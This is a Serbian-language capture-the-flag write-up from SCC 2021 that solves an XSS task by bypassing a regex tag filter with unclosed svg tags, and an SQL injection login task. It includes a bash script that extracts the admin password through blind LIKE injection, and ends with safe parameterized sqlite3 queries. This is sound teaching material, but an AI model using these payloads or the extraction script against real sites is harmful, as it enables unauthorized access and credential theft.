# CTF SCC 2021 (Serbian Cybersecurity Challenge)

Решавање задаткака прве фазе такмишења SCC 2021

Аутор: Дејан Петковић;
Датум: 2021-05-21;
Место: Електротехнички Факултет, Универзитет у Београду;

## XSS (Cross-Site Scripting)

Потенцијално место за XSS напад је књига гостију где корисник може унети своје име и поруку

![img](images/Pasted image 20210521083212.png)

У пољу за име може да се унесе максимално 10 карактера, међутим ако отворимо DevTools можемо да променимо аргументе input html tag-а

![img](images/Pasted image 20210521083536.png)

То је најлакши начин да пошаљемо текст произвољне дужине, алтернативно могли бисмо да користимо curl команду за слање произвољног POST захтева или помоћу можемо помоћу Burp Suite да пресретнемо и променимо POST захтев који се шаље

![img](images/Pasted image 20210521083949.png)

Када пошаљемо име дуже од 10 карактера видимо да се то не проверава на серверској страни што може потенцијално бити занимљиво јер је неко ко је правио апликацију можда рачунао да дужина имена неће бити дужа од 10 карактера, тако да ћемо све покушаје XSS покушавати на оба поља. 

Испробајмо прво најосновније XSS payload-ове:
```html
<script> alert(42) </script>
<svg onload=alert(0)>
<img src=no onerror=alert(1)>
```

![img](images/Pasted image 20210521085045.png)

Видимо да је све тагове обрисао и да је оставио само alert(42) који није унутар знакова веће и мање.

Пошто се у тексту задатка каже да се за филтрирање користи regex претпостављамо да је онда коришћен следећи regex
```
<.*?>
```

Као што се види на слици овакав regex је добро написан и неможемо га збунити стављањем већег броја знакова < од знакова > од ће нам дозволити да постоји знак < само ако након њега не долази ниједан знак > 

![img](images/Pasted image 20210521085507.png)

Сада ћемо покушати да преваримо regex тако што ћемо послати карактере који нису знакови веће и мање али можда их html ипак третира на исти начин
```html
&lt; svg onload=alert(123) &gt;
＜ svg onload=alert(123) ＞
```

![img](images/Pasted image 20210521090119.png)

Регуларни израз их није обрисао али нажалост они су приказани као обичан текст односно нијсмо успели да помоћу њих извршимо XSS напад

Следећи покушај се заснива на томе да регуларни израз неће обрисати таг све док га не затворимо зато можемо послати незатворени tag и надати се да ће html бити довољно флексибилан да га сам затвори
```html
neki tekst <svg onload=alert(0)
```

![img](images/Pasted image 20210521091544.png)

Са слике видимо да је наш payload прошао и то у оба поља па смо добили поред текста и доста празног простора што можемо видети у DevTools-у да је заправо svg tag
Међутим нисмо добили искачући alert прозор, а ако поново погледамо у DevTools видимо да је то зато што је html покушао да затвори h4 таг поред нашех alert-а и због тога имамо 
```javascript
alert(0)</h4
```
а то није валидна javascript команда па се неће извршити

![img](images/Pasted image 20210521091806.png)

То можемо да решимо барем на 2 начина тако што ћемо додати још један атрибут у наш html tag па ћемо тако одвојити *alert(0)* од *</h4* и тада ће alert радити
```html
123 <svg onload=alert(0) foo=
```

![img](images/Pasted image 20210521092154.png)

или на други начин тако што ћемо након alert(0) ставити //
```html
123 <svg onload=alert(0)//
```

у оба сличаја смо добили искачући alert прозор што значи да је наш XSS напад успео

### Могући напади

Да је ово прави сајт са књигом гостију злонамерни нападач би могао да направи копију сајту и да сваки пут кад покушате да уђете на на прави сајт он вас редиректује на његов злонамени сајт
```javascript
window.location = "https://њњњ.тоталнонезлонамернакњигагостију.срб";
```
а тамо би били коментари који би имали упадљив текст и линкове који би вас даље водили на fishing сајтове

Могао би вас чак редиректовати [негде где нико не би волео да буде редиректован](https://youtu.be/dQw4w9WgXcQ)

## SQLi (SQL Injection)

Након што покренемо задатак видимо да постоји само форма за пријављивање

Наравно покушћемо да се улогујемо са default-ним admin:admin али видимо да то не ради, ако покушамо још неке комбинације видећемо да није дозвољено коришћење размака као и ако унесемо само корисничко име а не унесемо лозинку да ће се страница освежити и да нам неће приказати "Login failed!" поруку

![img](images/Pasted image 20210521093825.png)
![img](images/Pasted image 20210521094217.png)

Наслов задатка нам каже да требамо покушати SQLi
Претпоставимо да упит изгледа овако некако
```sql
SELECT * FROM Prijava WHERE name='?' AND password='?'
```
где на место уметника долази оно што смо унели, што значи да ако уместо да за корисничко име унесемо само админ ми сами затворимо string моћићемо да мењамо сам упит

зато ћемо уместо admin:123 што би дало упит
```sql
SELECT * FROM Prijava WHERE name='admin' AND password='123'
```

ми ћемо укуцати за корисничко име: admin'--komentar
а за лозинку такође 123
па ће упит изгледати:
```sql
SELECT * FROM Prijava WHERE name='admin'--komentar' AND password='123'
```
напомена: не смеју размаци да се користе јер сајт то филтрира

како се у sql-у са -- означава почетак коментара то значи да ће оно што ће да се изврши бити:
```sql
SELECT * FROM Prijava WHERE name='admin'
```
 и ми битмо требали да се улогујемо као admin
 
 међутим ипак овај payload не пролази и враћа "Login failed!"
 
 па ћемо зато променити почетну претпоставку и претпоставити да је програмер који је правио сајт користио дупле наводнике а не апострофе односно да је упит облика
 ```sql
SELECT * FROM Prijava WHERE name="?" AND password="?"
```

зато ћемо покушати и са
```
admin"--
123
```

![img](images/Pasted image 20210521095246.png)
![img](images/Pasted image 20210521095255.png)

### Решење 2 

Задатак је решен али погледајмо још неке успешне покушаје

админ је обично први унети корисник па је његов id јединица, зато можемо пробати да унесемо
```
" or id=1 --
123
```
Како су заврањени размаци покушаћемо са:
```
"or(id)=1--
123
```
и то ће нас улоговати

### Решење 3

Ако на исти начин покушамо да се улогујемо на корисника 2
```
"or(id)=2--
123
```
видимо да он не постоји јер нам враћа "Login failed!" што значи да је упит успешно извршен (без грешке, јер да је било само би се страница освежила) и да је није понађен ниједан ред у табели са id-јем 2

То значи да је највероватније админ једини у тој табели па ако напишемо упит који је увек тачан добићемо све редове из табеле однсно само админа
```
"or(1=1)--
123
```

### Решење 4; Зар вас не занима која је права лозинка админа?

Задатак је решен али можемо наставити да се играмо и покушати да сазнамо лозинку админа тако да можемо да се улогујемо и без SQLi

ако покушамо
```
"or(foo)=2--
123
```
страница ће се освежити што значи да је дошло до грешке односно колона foo не постоји

Ако покушамо
```
"or(password)=2--
123
```
добићемо "Login failed!" што значи да страница постоји али да ниједан корисник нема лозинку 2

Пошто претпостављмо да постоји смао админ у табели можемо испитати каква је његова лозинка (да није то случај само бисмо додали услов да је id=1 или бисмо на почетку пре наводника написали admin за име)

```
"or(length(password))=1--
123
```
како нам ово враћа "Login failed!" значи да лозинка није дужине 1
уз мало тестирања услова 
```
"or(length(password))>0--jeste
"or(length(password))>10--jeste
"or(length(password))>30--Login failed!
"or(length(password))>20--jeste
"or(length(password))>25--Login failed!
"or(length(password))=21--jeste
```
долазимо до тога да је лозинка дугачка 21 карактер

сада можемо да испитамо које карактере лозинка садржи на следећи начин:
```
"or(password)like("%a%")--jeste
"or(password)like("%b%")--Login failed!
...
```

а можемо и да тестирамо почетак лозинке
```
"or(password)like("a%")--Login failed!
"or(password)like("b%")--Login failed!
...
"or(password)like("t%")--jeste

"or(password)like("ta%")--Login failed!
"or(password)like("tb%")--Login failed!
...
"or(password)like("to%")--jeste

"or(password)like("toa%")--Login failed!
"or(password)like("tob%")--Login failed!
...
"or(password)like("tot%")--jeste
```

да не бисмо ово ручно радило можемо да напишемо следећу bash скрипту
```bash
#!/bin/bash

#URL obavezno promeniti jer se razlikuje
URL="https://d4252da6f73458a07a638c206fd121d2f51a4690.platform-next.avatao-challenge.com/index.php"
dobra_lozinka=

#ako nije kao prvi argument zadato koliko da ceka nakon svakog pokusaja cekace 0.59 sekundi 
#odnosno radice oko 100 pokusaja u minutu 
if [ -n "$1" ]; then
    cekaj=$1
else
    cekaj=0.59
fi


function prijava {
    #zapamti kuki
    curl -s -D - -X POST --data "name=$1&password=a" "$URL" -c /tmp/kuki.txt -o /dev/null
    
    #pristupi sajtu pomocu kukija
    curl -s -X GET -b /tmp/kuki.txt "$URL"
}

function format {
	payload='"or(password)like("'
	payload=$payload$1
	payload=$payload'%")--'
}


#koristi sva mala slova(velika slova ne moraju jer je like funkcija nije case sensitive), brojeve i znakove interpunkcije osim znaka % koji u funkciji like ima specijalnu namenu 
dozvoljeni_karakteri=$(python3 -c "from string import *; punctuation = punctuation.replace('%',''); print(f'{ascii_lowercase}{digits}{punctuation}')")

#dok je duzina pronadjenog pocetka lozinke manja od 21 karakter
while [ ${#dobra_lozinka} -lt 21 ]; do
    echo
    #ispisi sta smo za sada pronasli da je lozinka
    echo Lozinka pocinje sa: $dobra_lozinka
    
	#za sledeci karakter pokusavaj redom iz niske dozvoljeni_karakteri sve dok ne pronadjemo pravi
	for (( i=0; i<${#dozvoljeni_karakteri}; i++ )); do
        password=$dobra_lozinka${dozvoljeni_karakteri:$i:1}
        
        #sprema payload
        format $password
        
        #trazi odgovor od stranici i cuva samo one redove koji sadrze rec flag
        odgovor=$(prijava "$payload" | grep flag)
        
        #ispisuje pokusano slovo
        echo -n ${dozvoljeni_karakteri:$i:1}  
              
        #ako postoji flag u odgovoru prosirujemo dobru_lozinku i prekidamo dalju proveru za to slovo
        if [ -n "$odgovor" ]; then
            dobra_lozinka=$dobra_lozinka${dozvoljeni_karakteri:$i:1}
            break
        fi
        
        #sacekaj malo da te sajt ne bi blokirao
        sleep $cekaj
    done
done

#na kraju ispisujemo sta smo pronasli
echo
echo
echo LOZINKA: $dobra_lozinka
```

![img](images/Pasted image 20210521103727.png)

На крају добијамо да је лозинка
```
"or(password)like("totallysecurepassword")--jeste
```
а дужина му је тачно 21 карактер

проверимо да ли је то лозинка за админа:
```
admin"and(password)like("totallysecurepassword")--
```

међутим ако покушамо да се улогујемо са
```
admin
totallysecurepassword
```
нећемо успети а то је зато што је like функција case insensitive зато ћемо покушати са:
```
admin
TotallySecurePassword
```
и то ће радити!

### Користите стандардне библиотеке

Већина XSS i SQLi напада се може спречити ако се исправно користе стандардне библиотеке у језику у ком се прави апликација

Нпр следећи код показује како се у python-у користи sqlite3 на 2 начанина први је рањив на SQLi јер само надовезује оно што је корисник унео на упит док у другом у упиту стоје упитници на местима на којима долази кориснички input а саме вредности се прослеђују као други параметар функције execute

```python
from sqlite3 import connect
conn=connect('baza.db')
cur=conn.cursor()

#ucitaj podatke
naziv = input("username: ")
password = input("username: ")


cur.execute(
    f"SELECT * FROM baza WHERE naziv='{naziv}' AND lozinka='{password}'"
    )
    
cur.execute(
    "SELECT * FROM baza WHERE naziv=? AND lozinka=?", 
    (naziv,password)
    )
```
